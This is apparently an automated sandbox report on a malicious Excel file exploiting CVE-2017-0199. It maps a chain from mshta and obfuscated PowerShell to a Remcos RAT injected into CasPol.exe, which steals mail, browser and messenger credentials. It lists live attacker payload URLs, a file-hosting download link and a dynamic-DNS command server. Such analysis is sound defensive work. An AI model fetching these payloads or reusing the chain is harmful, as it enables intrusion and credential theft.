                  System Shutdown/Reboot
                  CredentialsDomainsDefault Accounts23
                  Exploitation for Client Execution                  		1
                  DLL Side-Loading                  		1
                  Bypass User Account Control                  		21
                  Obfuscated Files or Information                  		111
                  Input Capture                  		1
                  Account Discovery                  		Remote Desktop Protocol1
                  Data from Local System                  		21
                  Encrypted Channel                  		Exfiltration Over Bluetooth1
                  Defacement
                  Email AddressesDNS ServerDomain Accounts133
                  Command and Scripting Interpreter                  		1
                  Windows Service                  		1
                  Access Token Manipulation                  		1
                  Install Root Certificate                  		2
                  Credentials in Registry                  		1
                  System Service Discovery                  		SMB/Windows Admin Shares21
                  Email Collection                  		1
                  Non-Standard Port                  		Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal Accounts2
                  Service Execution                  		Login Hook1
                  Windows Service                  		1
                  DLL Side-Loading                  		3
                  Credentials In Files                  		4
                  File and Directory Discovery                  		Distributed Component Object Model111
                  Input Capture                  		1
                  Remote Access Software                  		Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud Accounts4
                  PowerShell                  		Network Logon Script321
                  Process Injection                  		1
                  Bypass User Account Control                  		LSA Secrets39
                  System Information Discovery                  		SSH4
                  Clipboard Data                  		2
                  Non-Application Layer Protocol                  		Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                  Masquerading                  		Cached Domain Credentials3
                  Security Software Discovery                  		VNCGUI Input Capture213
                  Application Layer Protocol                  		Data Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items21
                  Virtualization/Sandbox Evasion                  		DCSync21
                  Virtualization/Sandbox Evasion                  		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                  Access Token Manipulation                  		Proc Filesystem3
                  Process Discovery                  		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt321
                  Process Injection                  		/etc/passwd and /etc/shadow1
                  Application Window Discovery                  		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                  IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
                  System Owner/User Discovery                  		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                  Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchdStripped PayloadsInput Capture1
                  Remote System Discovery                  		Software Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 signatures2 2 Behavior Graph ID: 1562330 Sample: OC25-11-24.xls Startdate: 25/11/2024 Architecture: WINDOWS Score: 100 111 Suricata IDS alerts for network traffic 2->111 113 Found malware configuration 2->113 115 Malicious sample detected (through community Yara rule) 2->115 117 24 other signatures 2->117 12 EXCEL.EXE 33 30 2->12         started        process3 dnsIp4 99 172.234.205.135, 49162, 49164, 49165 AKAMAI-ASN1EU United States 12->99 101 provit.uk 198.244.140.41, 443, 49161, 49163 RIDLEYSD-NETUS United States 12->101 81 nicewithgoodthings...dforeerybody[1].hta, HTML 12->81 dropped 155 Microsoft Office drops suspicious files 12->155 17 mshta.exe 10 12->17         started        21 mshta.exe 10 12->21         started        file5 signatures6 process7 dnsIp8 83 provit.uk 17->83 119 Suspicious powershell command line found 17->119 121 PowerShell case anomaly found 17->121 23 powershell.exe 23 17->23         started        85 provit.uk 21->85 27 powershell.exe 21->27         started        signatures9 process10 file11 77 creatgoodideaforfu...lopwithnicethin.vBs, Unicode 23->77 dropped 79 C:\Users\user\AppData\...\b53lag2c.cmdline, Unicode 23->79 dropped 127 Suspicious powershell command line found 23->127 129 Obfuscated command line found 23->129 29 wscript.exe 1 23->29         started        32 powershell.exe 4 23->32         started        34 csc.exe 2 23->34         started        37 wscript.exe 27->37         started        39 csc.exe 27->39         started        41 powershell.exe 27->41         started        signatures12 process13 file14 145 Suspicious powershell command line found 29->145 147 Wscript starts Powershell (via cmd or directly) 29->147 149 Bypasses PowerShell execution policy 29->149 153 2 other signatures 29->153 43 powershell.exe 2 29->43         started        151 Installs new ROOT certificates 32->151 73 C:\Users\user\AppData\Local\...\b53lag2c.dll, PE32 34->73 dropped 46 cvtres.exe 34->46         started        48 powershell.exe 37->48         started        75 C:\Users\user\AppData\Local\...\ovqlooon.dll, PE32 39->75 dropped 50 cvtres.exe 39->50         started        signatures15 process16 signatures17 131 Suspicious powershell command line found 43->131 133 Obfuscated command line found 43->133 52 powershell.exe 12 4 43->52         started        56 powershell.exe 48->56         started        process18 dnsIp19 87 ip.3105.filemail.com 193.30.119.205, 443, 49168, 49172 DFNVereinzurFoerderungeinesDeutschenForschungsnetzese unknown 52->87 89 3105.filemail.com 52->89 123 Writes to foreign memory regions 52->123 125 Injects a PE file into a foreign processes 52->125 58 CasPol.exe 52->58         started        91 3105.filemail.com 56->91 62 CasPol.exe 56->62         started        signatures20 process21 dnsIp22 93 newbeggin.duckdns.org 58->93 95 newbeggin.duckdns.org 31.13.224.72, 2412, 49174, 49175 SARNICA-ASBG Bulgaria 58->95 97 geoplugin.net 178.237.33.50, 49176, 80 ATOM86-ASATOM86NL Netherlands 58->97 135 Contains functionality to bypass UAC (CMSTPLUA) 58->135 137 Detected Remcos RAT 58->137 139 Tries to steal Mail credentials (via file registry) 58->139 143 6 other signatures 58->143 64 CasPol.exe 58->64         started        67 CasPol.exe 58->67         started        69 CasPol.exe 58->69         started        71 CasPol.exe 58->71         started        signatures23 141 Uses dynamic DNS services 93->141 process24 signatures25 103 Tries to steal Instant Messenger accounts or passwords 64->103 105 Tries to steal Mail credentials (via file / registry access) 64->105 107 Searches for Windows Mail specific files 64->107 109 Tries to harvest and steal browser information (history, passwords, etc) 67->109

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  OC25-11-24.xls16%ReversingLabsDocument-Excel.Exploit.CVE-2017-0199
                  OC25-11-24.xls100%Joe Sandbox ML

                  Dropped Files

                  No Antivirus matches

                  Unpacked PE Files

                  No Antivirus matches

                  Domains

                  No Antivirus matches

                  URLs

                  SourceDetectionScannerLabelLink
                  http://172.234.205.135/1244/secs/nicewithgoodthingswhichgosofargoodforeerybody.htahttp://172.234.2050%Avira URL Cloudsafe
                  http://172.234.205.135/0%Avira URL Cloudsafe
                  https://provit.uk/0%Avira URL Cloudsafe
                  newbeggin.duckdns.org0%Avira URL Cloudsafe
                  https://3105.filemail.com/api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNd0%Avira URL Cloudsafe
                  https://provit.uk/OAffUi?&chairlift=busy&cockpit=blushing&precipitation=honorable&skill=quizzical&timeout0%Avira URL Cloudsafe
                  https://provit.uk/OAffUi?&chairlift=busy&cockpit=blushing&precipitation=honorable&skill=quizzical&ti0%Avira URL Cloudsafe
                  http://172.234.205.135/1244/secs/nicewithgoodthingswhichgosofargoodforeerybody.hta...?L5.0%Avira URL Cloudsafe
                  http://172.234.205.135/1244/secs/nicewithgoodthingswhichgosofargoodforeerybody.htaout0%Avira URL Cloudsafe
                  https://3105.filemail.com/api/file/get?fil0%Avira URL Cloudsafe
                  http://172.234.205.135/1244/creatgoodideaforfuturebusinessdevelopwithnicethingsgetbackon.tIF.dll0%Avira URL Cloudsafe
                  http://172.234.205.135/1244/secs/nicewithgoodthingswhichgosofargoodforeerybody.hta0%Avira URL Cloudsafe
                  http://172.234.205.135/1244/secs/nicewithgoodthingswhichgosofargoodforeerybody.hta.NET4.0E)0%Avira URL Cloudsafe
                  http://172.234.205.135/1244/secs/nicewithgoodthingswhichgosofargoodforeerybody.htakill=qu0%Avira URL Cloudsafe
                  http://172.234.205.135/o-5.0%Avira URL Cloudsafe
                  https://provit.uk/.0%Avira URL Cloudsafe
                  http://172.234.205.135/1244/secs/nicewithgoodthingswhichgosofargoodforeerybody.htao0%Avira URL Cloudsafe
                  http://172.234.205.135/1244/secs/nicewithgoodthingswhichgosofargoodforeerybody.htae0%Avira URL Cloudsafe
                  http://172.234.205.135/1244/secs/nicewithgoodthingswhichgosofargoodforeerybody.hta...0%Avira URL Cloudsafe
                  http://172.234.205.135/1244/creatgoodideaforfuturebusinessdevelopwithnicethingsgetbackon.tIFp0%Avira URL Cloudsafe
                  https://3105.filemail.com/api/file/get?filp0%Avira URL Cloudsafe
                  http://172.234.205.135/1244/secs/nicewithgoodthingswhichgosofargoodforeerybody.htan0%Avira URL Cloudsafe
                  http://172.234.205.135/1244/SRVRSR.txt0%Avira URL Cloudsafe
                  http://172.234.205.135/1244/creatgoodideaforfuturebusinessdevelopwithnicethingsgetbackon.tIF0%Avira URL Cloudsafe
                  http://172.234.205.135/1244/secs/nicewithgoodthingswhichgosofargoodforeerybody.htaC:0%Avira URL Cloudsafe
                  http://172.234.205.135/1244/secs/nicewithgoodthingswhichgosofargoodforeerybody.htakill=quizzical&tim0%Avira URL Cloudsafe
                  http://172.234.205.135/1244/creatgoodideaforfuturebusinessdevelopwithnicethingsgetbackon.tIF.dlli2h0%Avira URL Cloudsafe
                  http://172.234.205.135/1244/crea0%Avira URL Cloudsafe
                  https://3105.filemail.com/api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c0%Avira URL Cloudsafe
                  http://172.234.205.135/1244/creatgoodideaforfuturebusinessdevelopwithnicethingsgetbackon.tIFC:0%Avira URL Cloudsafe
                  https://3105.filemail.com0%Avira URL Cloudsafe

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  provit.uk
                  		198.244.140.41
                  		truefalse
                    		high
                    newbeggin.duckdns.org
                    		31.13.224.72
                    		truetrue
                      		unknown
                      geoplugin.net
                      		178.237.33.50
                      		truefalse
                        		high
                        ip.3105.filemail.com
                        		193.30.119.205
                        		truetrue
                          		unknown
                          3105.filemail.com
                          		unknown
                          		unknowntrue
                            		unknown

                            Contacted URLs

                            NameMaliciousAntivirus DetectionReputation
                            newbeggin.duckdns.orgtrue
                            • Avira URL Cloud: safe
                            		unknown
                            https://provit.uk/OAffUi?&chairlift=busy&cockpit=blushing&precipitation=honorable&skill=quizzical&timeoutfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://172.234.205.135/1244/secs/nicewithgoodthingswhichgosofargoodforeerybody.htatrue
                            • Avira URL Cloud: safe
                            		unknown
                            http://geoplugin.net/json.gpfalse
                              		high
                              http://172.234.205.135/1244/SRVRSR.txttrue
                              • Avira URL Cloud: safe
                              		unknown
                              http://172.234.205.135/1244/creatgoodideaforfuturebusinessdevelopwithnicethingsgetbackon.tIFtrue
                              • Avira URL Cloud: safe
                              		unknown
                              https://3105.filemail.com/api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7ctrue
                              • Avira URL Cloud: safe
                              		unknown

                              URLs from Memory and Binaries

                              NameSourceMaliciousAntivirus DetectionReputation
                              http://b.scorecardresearch.com/beacon.jsbhvD598.tmp.30.drfalse
                                		high
                                https://3105.filemail.com/api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNdpowershell.exe, 0000001B.00000002.544414000.00000000024C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://acdn.adnxs.com/ast/ast.jsbhvD598.tmp.30.drfalse
                                  		high
                                  http://www.imvu.comrCasPol.exe, 00000021.00000002.530176368.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                    		high
                                    http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_167%2Cw_312%2Cc_fill%2Cg_faces%2Ce_bhvD598.tmp.30.drfalse
                                      		high
                                      http://172.234.205.135/1244/secs/nicewithgoodthingswhichgosofargoodforeerybody.htahttp://172.234.205mshta.exe, 00000004.00000003.427071781.0000000002F25000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.427222699.0000000002F25000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.476827470.0000000002E85000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.472367712.0000000002E85000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://ocsp.entrust.net03mshta.exe, 00000004.00000002.429534936.0000000003C1F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.427140274.0000000003C1E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.478850860.00000000033C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.470419900.00000000033C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.473015437.00000000033C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.479560471.00000000033C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.467588061.00000000033BF000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
                                        https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1bhvD598.tmp.30.drfalse
                                          		high
                                          http://172.234.205.135/mshta.exe, 00000004.00000003.427140274.0000000003C5C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.429534936.0000000003C5C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.479530310.00000000033A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://172.234.205.135/1244/secs/nicewithgoodthingswhichgosofargoodforeerybody.htaoutmshta.exe, 00000004.00000003.425003533.0000000000154000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.470316300.0000000000435000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://contoso.com/Licensepowershell.exe, 00000005.00000002.452948014.0000000012311000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://provit.uk/mshta.exe, 00000004.00000002.429003088.0000000003BFF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.429534936.0000000003C1F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.427140274.0000000003C1E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.478850860.00000000033C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.479236959.0000000000422000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.470419900.00000000033C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.473015437.00000000033C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.470316300.0000000000422000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.479560471.00000000033C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.478821092.0000000000422000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.467588061.00000000033BF000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://support.google.com/chrome/?p=plugin_flashCasPol.exe, 0000001E.00000002.534937207.0000000000F4A000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000001E.00000002.534902522.0000000000EA9000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              http://cdn.taboola.com/libtrc/static/thumbnails/f539211219b796ffbb49949997c764f0.pngbhvD598.tmp.30.drfalse
                                                		high
                                                http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0mshta.exe, 00000004.00000002.429534936.0000000003C1F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.427140274.0000000003C1E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.478850860.00000000033C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.470419900.00000000033C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.473015437.00000000033C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.479560471.00000000033C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.467588061.00000000033BF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://www.diginotar.nl/cps/pkioverheid0mshta.exe, 00000004.00000002.429534936.0000000003C1F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.427140274.0000000003C1E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.478850860.00000000033C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.470419900.00000000033C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.473015437.00000000033C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.479560471.00000000033C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.467588061.00000000033BF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://cvision.media.net/new/286x175/2/137/169/197/852af93e-e705-48f1-93ba-6ef64c8308e6.jpg?v=9bhvD598.tmp.30.drfalse
                                                      		high
                                                      http://acdn.adnxs.com/ib/static/usersync/v3/async_usersync.htmlbhvD598.tmp.30.drfalse
                                                        		high
                                                        http://www.nirsoft.netCasPol.exe, 0000001E.00000002.532687990.0000000000364000.00000004.00000010.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://deff.nelreports.net/api/report?cat=msnbhvD598.tmp.30.drfalse
                                                            		high
                                                            https://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.9.1.min.jsbhvD598.tmp.30.drfalse
                                                              		high
                                                              http://www.imvu.com/OCasPol.exe, 00000021.00000002.530147488.00000000003FC000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://go.microspowershell.exe, 00000005.00000002.448423237.00000000036A0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.486539543.00000000022FB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://provit.uk/OAffUi?&chairlift=busy&cockpit=blushing&precipitation=honorable&skill=quizzical&timshta.exe, 00000010.00000002.479236959.000000000040E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.470316300.000000000040E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.478821092.0000000000422000.00000004.00000020.00020000.00000000.sdmp, OC25-11-24.xls, ~DF5ADC8DB78B38F887.TMP.0.drfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.comCasPol.exe, 00000021.00000002.530176368.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                    		high
                                                                    https://3105.filemail.com/api/file/get?filpowershell.exe, 0000001B.00000002.542881250.0000000000318000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.542881250.000000000035D000.00000004.00000020.00020000.00000000.sdmptrue
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    http://cache.btrll.com/default/Pix-1x1.gifbhvD598.tmp.30.drfalse
                                                                      		high
                                                                      http://pr-bh.ybp.yahoo.com/sync/msft/1614522055312108683bhvD598.tmp.30.drfalse
                                                                        		high
                                                                        https://www.google.comCasPol.exe, CasPol.exe, 00000021.00000002.530176368.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                          		high
                                                                          http://geoplugin.net/json.gp/CCasPol.exe, 00000023.00000002.542292669.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            http://o.aolcdn.com/ads/adswrappermsni.jsbhvD598.tmp.30.drfalse
                                                                              		high
                                                                              http://cdn.taboola.com/libtrc/msn-home-network/loader.jsbhvD598.tmp.30.drfalse
                                                                                		high
                                                                                http://www.msn.com/?ocid=iehpbhvD598.tmp.30.drfalse
                                                                                  		high
                                                                                  https://contoso.com/powershell.exe, 00000005.00000002.452948014.0000000012311000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://nuget.org/nuget.exepowershell.exe, 00000005.00000002.452948014.0000000012311000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://www.msn.com/en-us/homepage/secure/silentpassport?secure=false&lc=1033bhvD598.tmp.30.drfalse
                                                                                        		high
                                                                                        http://static.chartbeat.com/js/chartbeat.jsbhvD598.tmp.30.drfalse
                                                                                          		high
                                                                                          http://www.msn.com/de-de/?ocid=iehpbhvD598.tmp.30.drfalse
                                                                                            		high
                                                                                            http://172.234.205.135/1244/secs/nicewithgoodthingswhichgosofargoodforeerybody.hta...?L5.mshta.exe, 00000010.00000003.470316300.0000000000435000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            		unknown
                                                                                            http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_90%2Cw_120%2Cc_fill%2Cg_faces:auto%bhvD598.tmp.30.drfalse
                                                                                              		high
                                                                                              https://login.yahoo.com/config/loginCasPol.exefalse
                                                                                                		high
                                                                                                http://172.234.205.135/1244/creatgoodideaforfuturebusinessdevelopwithnicethingsgetbackon.tIF.dllpowershell.exe, 00000012.00000002.490397083.000000001AD05000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                		unknown
                                                                                                http://www.nirsoft.net/CasPol.exe, 00000021.00000002.530176368.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  http://ocsp.entrust.net0Dmshta.exe, 00000004.00000002.429534936.0000000003C1F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.427140274.0000000003C1E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.478850860.00000000033C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.470419900.00000000033C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.473015437.00000000033C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.479560471.00000000033C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.467588061.00000000033BF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000005.00000002.448423237.00000000022E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.512617659.00000000021F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.486539543.00000000020F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.544414000.00000000022C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      http://172.234.205.135/o-5.mshta.exe, 00000010.00000002.479530310.00000000033A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      		unknown
                                                                                                      https://contextual.media.net/803288796/fcmain.js?&gdpr=1&cid=8CUT39MWR&cpcd=2K6DOtg60bLnBhB3D4RSbQ%3bhvD598.tmp.30.drfalse
                                                                                                        		high
                                                                                                        http://p.rfihub.com/cm?in=1&pub=345&userid=1614522055312108683bhvD598.tmp.30.drfalse
                                                                                                          		high
                                                                                                          http://ib.adnxs.com/pxj?bidder=18&seg=378601&action=setuids(bhvD598.tmp.30.drfalse
                                                                                                            		high
                                                                                                            https://cvision.media.net/new/286x175/3/72/42/210/948f45db-f5a0-41ce-a6b6-5cc9e8c93c16.jpg?v=9bhvD598.tmp.30.drfalse
                                                                                                              		high
                                                                                                              http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_80%2Ch_334%2Cw_312%2Cc_fill%2Cg_faces%2Ce_shbhvD598.tmp.30.drfalse
                                                                                                                		high
                                                                                                                http://cdn.taboola.com/libtrc/impl.thin.277-63-RELEASE.jsbhvD598.tmp.30.drfalse
                                                                                                                  		high
                                                                                                                  http://nuget.org/NuGet.exepowershell.exe, 00000005.00000002.452948014.0000000012311000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    http://172.234.205.135/1244/secs/nicewithgoodthingswhichgosofargoodforeerybody.hta.NET4.0E)mshta.exe, 00000004.00000002.428662532.0000000000147000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.428612562.0000000000147000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.425003533.0000000000154000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    • Avira URL Cloud: safe
                                                                                                                    		unknown
                                                                                                                    https://www.ccleaner.com/go/app_cc_pro_trialkeybhvD598.tmp.30.drfalse
                                                                                                                      		high
                                                                                                                      http://crl.entrust.net/server1.crl0mshta.exe, 00000004.00000002.429534936.0000000003C1F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.427140274.0000000003C1E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.478850860.00000000033C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.470419900.00000000033C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.473015437.00000000033C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.479560471.00000000033C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.467588061.00000000033BF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        http://172.234.205.135/1244/secs/nicewithgoodthingswhichgosofargoodforeerybody.htakill=qumshta.exe, 00000004.00000003.425003533.0000000000111000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.470316300.0000000000422000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        • Avira URL Cloud: safe
                                                                                                                        		unknown
                                                                                                                        https://contextual.media.net/8/nrrV73987.jsbhvD598.tmp.30.drfalse
                                                                                                                          		high
                                                                                                                          http://www.imvu.comCasPol.exe, CasPol.exe, 00000021.00000002.530176368.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            https://contoso.com/Iconpowershell.exe, 00000005.00000002.452948014.0000000012311000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              https://provit.uk/.mshta.exe, 00000004.00000002.429003088.0000000003BE0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              • Avira URL Cloud: safe
                                                                                                                              		unknown
                                                                                                                              http://172.234.205.135/1244/secs/nicewithgoodthingswhichgosofargoodforeerybody.hta...mshta.exe, 00000010.00000003.470316300.0000000000435000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              • Avira URL Cloud: safe
                                                                                                                              		unknown
                                                                                                                              https://contextual.media.net/bhvD598.tmp.30.drfalse
                                                                                                                                		high
                                                                                                                                http://widgets.outbrain.com/external/publishers/msn/MSNIdSync.jsbhvD598.tmp.30.drfalse
                                                                                                                                  		high
                                                                                                                                  https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2bhvD598.tmp.30.drfalse
                                                                                                                                    		high
                                                                                                                                    http://www.msn.com/bhvD598.tmp.30.drfalse
                                                                                                                                      		high
                                                                                                                                      https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:aubhvD598.tmp.30.drfalse
                                                                                                                                        		high
                                                                                                                                        http://172.234.205.135/1244/secs/nicewithgoodthingswhichgosofargoodforeerybody.htaemshta.exe, 00000004.00000002.429003088.0000000003BE0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.479236959.0000000000422000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.470316300.0000000000435000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.478821092.0000000000422000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                        		unknown
